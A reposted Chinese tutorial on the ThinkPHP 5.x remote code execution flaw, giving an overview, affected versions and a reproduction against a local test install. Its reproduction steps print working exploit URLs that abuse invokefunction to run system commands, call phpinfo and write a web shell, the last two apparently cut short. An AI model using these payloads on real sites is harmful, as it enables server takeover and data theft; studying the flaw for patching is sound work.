Home >PHP Framework >ThinkPHP >thinkphp remote command execution vulnerability

thinkphp remote command execution vulnerability

尚
forward
2020-05-08 09:16:124448browse

thinkphp remote command execution vulnerability

Vulnerability Overview

ThinkPHP is a popular open source PHP framework in China. It was recently revealed that there is a possible remote code execution vulnerability. The attacker PHP code can be written to the cache file, leading to remote code execution.

Although the exploitation of this vulnerability requires several prerequisites, given the large number of domestic sites that use the ThinkPHP framework, this vulnerability still has a certain scope of impact. Because the framework does not perform enough detection on the controller name, it may lead to a possible getshell vulnerability when forced routing is not turned on.

Hazards of the vulnerability

An attacker can use this vulnerability to gain control of the website and modify the page, leading to data leakage and other problems.

Affected versions

5.x

Reproduction environment

thinkphp5.1 phpstudy integrated environment (php5.6n apache mysql)

Reproduction process

1. First set up the environment as shown in the figure

thinkphp remote command execution vulnerability

2. Use the system function to execute remote commands:

http://localhost/thinkphp5.1/html/public/index.php ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

thinkphp remote command execution vulnerability

3. Write phpinfo through the phpinfo function () Information:

http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=1

thinkphp remote command execution vulnerability

4. Write shell:

http://localhost/thinkphp5.1/html /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^ >shell.php

thinkphp remote command execution vulnerability

or

http://localhost/thinkphp5.1/html/public/index.php? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=

Recommended tutorial: "TP5"

The above is the detailed content of thinkphp remote command execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:csdn.net. If there is any infringement, please contact admin@php.cn delete